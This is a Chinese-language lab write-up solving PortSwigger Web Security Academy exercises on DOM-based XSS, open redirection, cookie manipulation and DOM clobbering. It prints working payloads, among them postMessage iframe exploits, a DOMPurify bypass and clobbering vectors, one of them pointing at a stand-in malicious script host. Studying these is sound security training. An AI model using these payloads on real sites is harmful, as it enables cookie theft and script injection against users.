Portswigger web security academy：DOM-based vulnerabilities

DOM-based vulnerabilities

DOM-based vulnerabilities
- 1 - DOM XSS using web messages
- 2 - DOM XSS using web messages and a JavaScript URL
- 3 - DOM XSS using web messages and JSON.parse
- 4 - DOM-based open redirection
- 5 - DOM-based cookie manipulation
- 6 - Exploiting DOM clobbering to enable XSS
- 7 - Clobbering DOM attributes to bypass HTML filters

材料里没列完，直接做题吧

1 - DOM XSS using web messages

题目描述
- 这个lab有一个简单的web-message漏洞
要求
- 利用exploit server给网站发送一个信息，使其执行alert(document.cookie)

解题过程

查看源码，发现如下代码

window.addEventListener('message', function(e) {
	document.getElementById('ads').innerHTML = e.data;
})

去MDN看了下web message，是一个跨源通信的函数，可以通过iframe来实现这个功能

构造exp

先尝试了用iframe+script标签的形式，但是发现script标签不会等iframe加载完，所以放进了iframe中
postMessage()的第二个参数使用通配符，允许目标站点为任意域（防止CORS被阻止）
关于post进去的数据也进行了尝试（chrome），svg,script都不行，想了一下应该与标签的解析流有关（插入的标签没有被解析），这里用img


</code></pre>
</li>
</ul>
</li>
</ul>
<h2 id="2---dom-xss-using-web-messages-and-a-javascript-url">2 - DOM XSS using web messages and a JavaScript URL</h2>
<ul>
<li>
<p>题目描述</p>
<ul>
<li>此lab存在DOM-based跳转漏洞（通过web message诱发）</li>
</ul>
</li>
<li>
<p>要求</p>
<ul>
<li>构造页面，使访问者执行<code>alert(document.cookie)</code></li>
</ul>
</li>
<li>
<p>解题过程</p>
<ul>
<li>
<p>还是先找代码</p>
<pre><code class="language-js">window.addEventListener('message', function(e) {
    var url = e.data;  
    if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {  //传入的url包含http（s）:
        location.href = url;// 跳转
    }
}, false);
</code></pre>
<ul>
<li>
<p>弹窗可以通过伪<code>javascript</code>伪协议调用</p>
<pre><code class="language-js">let url = 'javscript:alert()-"http:"';
location.href = url;

// 但是这样不好写进去，因为单双引号（所以需要借助编码环境进行编码，事件内部是js解析环境，会先进行unicode解码，所以可以进行编码
this.contentWindow.postMessage('javascript:alert(document.cookie)-"http:"',"*")
</code></pre>
</li>
</ul>
</li>
<li>
<p>构造exp</p>
<pre><code class="language-html"><iframe src="https://ac901fa21ee08d748031385e00110021.web-security-academy.net/" onload='&#116;&#104;&#105;&#115;&#46;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#87;&#105;&#110;&#100;&#111;&#119;&#46;&#112;&#111;&#115;&#116;&#77;&#101;&#115;&#115;&#97;&#103;&#101;&#40;&#39;&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;&#41;&#45;&#34;&#104;&#116;&#116;&#112;&#58;&#34;&#39;&#44;&#34;&#42;&#34;&#41;'>
</code></pre>
</li>
</ul>
</li>
</ul>
<h2 id="3---dom-xss-using-web-messages-and-jsonparse">3 - DOM XSS using web messages and <code>JSON.parse</code></h2>
<ul>
<li>
<p>题目描述</p>
<ul>
<li>此lab使用了<code>web messageing</code>并把消息当作json解析</li>
</ul>
</li>
<li>
<p>要求</p>
<ul>
<li>构造页面，使访问者执行<code>alert(document.cookie)</code></li>
</ul>
</li>
<li>
<p>解题过程</p>
<ul>
<li>
<p>先看代码</p>
<pre><code class="language-js">window.addEventListener('message', function(e) {
    var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
    document.body.appendChild(iframe);
    try {
        d = JSON.parse(e.data);
    } catch(e) {
        return;
    }
    switch(d.type) {
        case "page-load":
            ACMEplayer.element.scrollIntoView();
            break;
        case "load-channel":
            ACMEplayer.element.src = d.url; // 如果d.type=="load-channel"，则讲url赋给iframe
            break;
        case "player-height-changed":
            ACMEplayer.element.style.width = d.width + "px";
            ACMEplayer.element.style.height = d.height + "px";
            break;
    }
}, false);
</code></pre>
</li>
<li>
<p>构造exp</p>
<pre><code class="language-html"><iframe src="https://ac0b1f8a1e418d0a802e3c2100ea005f.web-security-academy.net/" onload='var a={"type":"load-channel","url":"javascript:alert(document.cookie)"};this.contentWindow.postMessage(JSON.stringify(a),"*")'>
</code></pre>
<ul>
<li>这里需要用<code>JSON.stringify()</code>把json转换成字符串，不能直接传输对象</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="4---dom-based-open-redirection">4 - DOM-based open redirection</h2>
<ul>
<li>
<p>题目描述</p>
<ul>
<li>此lab有一个DOM型的url跳转漏洞</li>
</ul>
</li>
<li>
<p>要求</p>
<ul>
<li>把受害者拐进exploit server</li>
</ul>
</li>
<li>
<p>解题过程</p>
<ul>
<li>
<p>点进一个详情页面，发现返回链接比较特殊</p>
<pre><code class="language-html"><a href="#" onclick="returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1];else location.href = '/';">Back to Blog</a>
</code></pre>
<ul>
<li>把<code>location</code>（地址栏里全部的东西，包括<code>#</code>后面的内容）用正则<code>url=(https?:\/\/.+)</code>匹配，如果能匹配到，就跳转到匹配到的url</li>
</ul>
</li>
<li>
<p>构造exp</p>
<ul>
<li>这块想了半天，把受害者拐进exploit server需要点击按钮，总不能继续xss吧，然后去看了solution，自己就是受害者？？？</li>
<li>第二个，使用<code>#</code>也可以达到目的，但是不给过，只能用<code>&</code>（猜测后端通过检测<code>url</code>参数判断）</li>
</ul>
<pre><code class="language-js">https://ac891f911e4e7dcb80201fd4009d0060.web-security-academy.net/post?postId=4#url=https://acc61fdf1e577d2480831f0b019e002b.web-security-academy.net

solution: # -> &
</code></pre>
</li>
</ul>
</li>
</ul>
<h2 id="5---dom-based-cookie-manipulation">5 - DOM-based cookie manipulation</h2>
<ul>
<li>
<p>题目描述</p>
<ul>
<li>此lab存在DOM型客户端cookie修改</li>
</ul>
</li>
<li>
<p>要求</p>
<ul>
<li>插入一个可以实现XSS（弹cookie）的cookie</li>
</ul>
</li>
<li>
<p>解题过程</p>
<ul>
<li>
<p>在商品详情页面看到如下代码</p>
<pre><code class="language-js">document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</code></pre>
<p>可以通过<code>&</code>/<code>#</code>插入内容</p>
</li>
<li>
<p>在主页，发现在访问过之后，会出现浏览记录，而且会被<code>'</code>逃逸</p>
<pre><code class="language-html"><a href="https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#" -alert()-'="">'&gt;Last viewed product</a>

之前访问的是https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#'-alert()-'>
</code></pre>
</li>
<li>
<p>构造exp</p>
<pre><code><iframe src="https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#'%3E%3Csvg/onload=alert(document.cookie)%3E" onload="this.src='https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/'">
</code></pre>
</li>
</ul>
</li>
</ul>
<h2 id="6---exploiting-dom-clobbering-to-enable-xss">6 - Exploiting DOM clobbering to enable XSS</h2>
<ul>
<li>
<p>题目描述</p>
<ul>
<li>评论功能点允许安全的HTML</li>
</ul>
</li>
<li>
<p>要求</p>
<ul>
<li>构造HTML注入，污染（clobber）变量？，调用<code>alert()</code></li>
<li>hint：预期解只在chrome有效</li>
</ul>
</li>
<li>
<p>解题过程</p>
<ul>
<li>
<p>在详情页面看到函数调用<code>loadComments('/post/comment')</code>，看看函数定义</p>
<pre><code class="language-js">function loadComments(postCommentPath) {
    let xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
            let comments = JSON.parse(this.responseText);
            displayComments(comments);
        }
    };
    xhr.open("GET", postCommentPath + window.location.search);
    xhr.send();

    function escapeHTML(data) {
        return data.replace(/[<>'"]/g, function(c){
            return '&#' + c.charCodeAt(0) + ';';
        })
    }

    function displayComments(comments) {
        let userComments = document.getElementById("user-comments");

        for (let i = 0; i < comments.length; ++i)
        {
            comment = comments[i];
            let commentSection = document.createElement("section");
            commentSection.setAttribute("class", "comment");

            let firstPElement = document.createElement("p");

            let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
            let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';

            let divImgContainer = document.createElement("div");
            divImgContainer.innerHTML = avatarImgHTML

            if (comment.author) {
                if (comment.website) {
                    let websiteElement = document.createElement("a");
                    websiteElement.setAttribute("id", "author");
                    websiteElement.setAttribute("href", comment.website);
                    firstPElement.appendChild(websiteElement)
                }

                let newInnerHtml = firstPElement.innerHTML + DOMPurify.sanitize(comment.author)
                firstPElement.innerHTML = newInnerHtml
            }

            if (comment.date) {
                let dateObj = new Date(comment.date)
                let month = '' + (dateObj.getMonth() + 1);
                let day = '' + dateObj.getDate();
                let year = dateObj.getFullYear();

                if (month.length < 2)
                    month = '0' + month;
                if (day.length < 2)
                    day = '0' + day;

                dateStr = [day, month, year].join('-');

                let newInnerHtml = firstPElement.innerHTML + " | " + dateStr
                firstPElement.innerHTML = newInnerHtml
            }

            firstPElement.appendChild(divImgContainer);

            commentSection.appendChild(firstPElement);

            if (comment.body) {
                let commentBodyPElement = document.createElement("p");
                commentBodyPElement.innerHTML = DOMPurify.sanitize(comment.body);

                commentSection.appendChild(commentBodyPElement);
            }
            commentSection.appendChild(document.createElement("p"));

            userComments.appendChild(commentSection);
        }
    }
};
</code></pre>
</li>
<li>
<p>挨着看了一遍，感觉29、30行可能存在问题，但是不知道怎么利用</p>
<ul>
<li>试了一下在提交参数的时候增加<code>avatar</code>，没有用</li>
</ul>
</li>
<li>
<p>放着先测一下能用哪些标签</p>
<ul>
<li>
<pre><code>a
audio
b
big
br
button
canvas
center
cite
code
datalist
dfn
del
details
filedset
h1
hr
i
input
ins
kdb
label
li
mark
marquee
meter
optgroup
progress
q
rp
s
samp
select 
svg
textarea
u
</code></pre>
<ul>
<li>
<p>有点多，挑一个最喜欢的svg测测</p>
</li>
<li>
<p>然后发现，返回的数据包是没有过滤的，过滤全部在前端的<code>DOMPurify.sanitize()</code>中进行</p>
</li>
<li>
<p>本以为这条路走不通了，然后在搜这个函数的时候看到一篇Bypass DOMPurify的文章</p>
<pre><code class="language-html"><form>
<math><mtext>
</form><form>
<mglyph>
<style></math><img src onerror=alert(1)>
</code></pre>
</li>
</ul>
</li>
</ul>
</li>
<li>
<p>回到代码看看</p>
<ul>
<li>
<p>如果能找到给<code>windows.属性</code>赋值的方法（通过html或请求），就可以通过以下代码进行XSS</p>
<pre><code class="language-js">let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';
</code></pre>
</li>
<li>
<p>去看了下材料DOM clobber 里面介绍了一种方法，</p>
<pre><code class="language-html"><script>
 window.onload = function(){
    let someObject = window.someObject || {};
    let script = document.createElement('script');
    script.src = someObject.url;
    document.body.appendChild(script);
 };
</script>
<!--
To exploit this vulnerable code, you could inject the following HTML to clobber the someObject reference with an anchor element:
As the two anchors use the same ID, the DOM groups them together in a DOM collection. The DOM clobbering vector then overwrites the someObject reference with this DOM collection. A name attribute is used on the last anchor element in order to clobber the url property of the someObject object, which points to an external script.
-->

<!-- 要修改 window.someObject.url  则使id=someObject  name=url  href=目标内容 -->
<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>
</code></pre>
</li>
<li>
<p>测试发现<code>javascript:</code>伪协议被过滤</p>
</li>
<li>
<p>试试能不能逃逸出字符串，最后还是看了solution，用的<code>&quot;("的html实体编码)</code></p>
</li>
</ul>
</li>
<li>
<p>构造exp（调用<code>alert()</code>函数就行了，加<code>document.cookie</code>会被过滤</p>
<pre><code class="language-html"><a id=defaultAvatar><a id=defaultAvatar name=avatar href="&quot;onerror=alert()//">
</code></pre>
</li>
</ul>
</li>
</ul>
<h2 id="7---clobbering-dom-attributes-to-bypass-html-filters">7 - Clobbering DOM attributes to bypass HTML filters</h2>
<ul>
<li>
<p>题目描述</p>
<ul>
<li>此lab使用了<code>HTMLJanitor</code>库，可以通过<code>DOM clobber</code>构造攻击向量bypass过滤器并调用<code>alert(document.cookie)</code></li>
</ul>
</li>
<li>
<p>要求</p>
<ul>
<li>给受害者发送一个自动执行的攻击向量，<code>alert(document.cookie)</code></li>
<li>intended solution for chrome</li>
</ul>
</li>
<li>
<p>解题过程</p>
<ul>
<li>
<p>进详情页面看了看代码，没有上一题的直接引用<code>window.object/document.object</code>，此外，引用了HTMLJanitor库</p>
</li>
<li>
<p>反复看了几遍<code>HTMLJanitor</code>的代码，没找到突破口在哪里，于是去看了solution + Donx发现的DOM clobber的介绍</p>
<pre><code class="language-html"><form id=x tabindex=0 onfocus=alert(document.cookie)><input id=attributes>
<!-- 覆盖 使 x.attributes == undefined  -->
    
<iframe src=https://your-lab-id.web-security-academy.net/post?postId=3 onload="setTimeout(someArgument=>this.src=this.src+'#x',500)">
</code></pre>
<ul>
<li>
<p>关键代码</p>
<pre><code class="language-js">for (var a = 0; a < node.attributes.length; a += 1) {
  var attr = node.attributes[a];

  if (shouldRejectAttr(attr, allowedAttrs, node)) {
    node.removeAttribute(attr.name);
    // Shift the array to continue looping.
    a = a - 1;
  }
}

// Sanitize children
this._sanitize(document, node);

function shouldRejectAttr(attr, allowedAttrs, node) {
  var attrName = attr.name.toLowerCase();

  if (allowedAttrs === true) {
    return false;
  } else if (typeof allowedAttrs[attrName] === "function") {
    return !allowedAttrs[attrName](attr.value, node);
  } else if (typeof allowedAttrs[attrName] === "undefined") {
    return true;
  } else if (allowedAttrs[attrName] === false) {
    return true;
  } else if (typeof allowedAttrs[attrName] === "string") {
    return allowedAttrs[attrName] !== attr.value;
  }

  return false;
}
</code></pre>
</li>
<li>
<p>使用<code><form id=x tabindex=0 onfocus=alert(document.cookie)><input id=attributes></code>进行DOM clobber，使得<code>form.attributes == undefined</code></p>
</li>
<li>
<p>在检测的代码中可以看到，当<code>node.attributes == undefined</code>时，会绕过<code>removeAttribute()</code>，保留下标签中的事件</p>
</li>
</ul>
</li>
<li>
<p>之后的<code>iframe</code>标签是用来触发<code>onfocus</code>的，必须等到加载评论的ajax结束</p>
</li>
</ul>
</li>
</ul>
						  
					  </div>
						<!--conend-->
							<div class="p-2"></div>

						<div class="arcinfo my-3 fs-7 text-center">
							
							
			<a href='/t/etagid1134-0.html' class='tagbtn' target='_blank'>靶场</a><a href='/t/etagid50253-0.html' class='tagbtn' target='_blank'>DOM-basedvulnerabili</a>							
						



						</div>
						
						<div class="p-2"></div>

						

						
					</div>
					<div class="p-2"></div>
					<!--xg-->
					<div class="lbox p-4 shadow-sm rounded-3">
						<div class="boxtitle"><h2 class="fs-4">相关</h2></div>
						
<hr>				
						
			<div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-555880.html">[Pikachu 靶场] 8-不安全文件上传</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div><div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-530186.html">文件上传、下载漏洞解析及靶场复现</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div><div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-457379.html">【Microsoft Azure 的1024种玩法】 十三.Azure cloud｜带你快速上手DVWA漏洞靶场</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div><div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-438573.html">记一次靶场渗透记录</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div><div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-404437.html">vulnhub 靶场 HACKATHONCTF: 2</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div><div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-382958.html">Upload-labs文件上传靶场通关教程&#x1F436;</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div><div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-368996.html">webgoat靶场搭建</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div><div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-525376.html">Portswigger web security academy：DOM-based vulnerabilities</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div><div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-464025.html">Portswigger web security academy：DOM-based vulnerabilities</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div><div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-329628.html">Portswigger web security academy：DOM-based vulnerabilities</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div><div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-283690.html">Web For Pentester靶场</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div><div class="row g-0 py-2 border-bottom align-items-center">
																
								<div class="col-7 col-lg-11 border-lg-end">
										<h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-260184.html">关于 Vulnhub 靶场靶机用 Vmware 装载时产生的问题</a></h3>
									
									<div class="ltag fs-8 d-none d-lg-block">
								 

        </div>
								</div>
							
							</div>            
            
            <!---->
                                    
           <!---->
  			
						

					</div>
					<!--xgend-->
				</div>

				<div class="col-lg-3 col-12 p-0 ps-lg-2">
					<!--box-->									
					<!--boxend-->
					<!--<div class="p-2"></div>-->

					<!--box-->
									<div class="lbox p-4 shadow-sm rounded-3">
					
									   <div class="boxtitle pb-2"><h2 class="fs-4"><a href="#">标签</a></h2></div>
										<div class="clearfix"></div>
										<ul class="m-0 p-0 fs-7 r-tag">
										</ul>
									

										
										<div class="clearfix"></div>
									</div>
					<!--box end-->

					
				</div>

			</div>
		
		
		
		</div>	

</main>
						<div class="p-2"></div>
<footer>
<div class="container-fluid p-0 bg-black">
	<div class="container p-0  fs-8">
	<p class="text-center m-0 py-2 text-white-50">一品网 <a class="text-white-50" href="https://beian.miit.gov.cn/" target="_blank">冀ICP备14022925号-6</a></p>
	</div>	
</div>
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?6e3dd49b5f14d985cc4c6bdb9248f52b";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
</footer>
		
<script src="/skin/bootstrap.bundle.js"></script>

</body>
</html>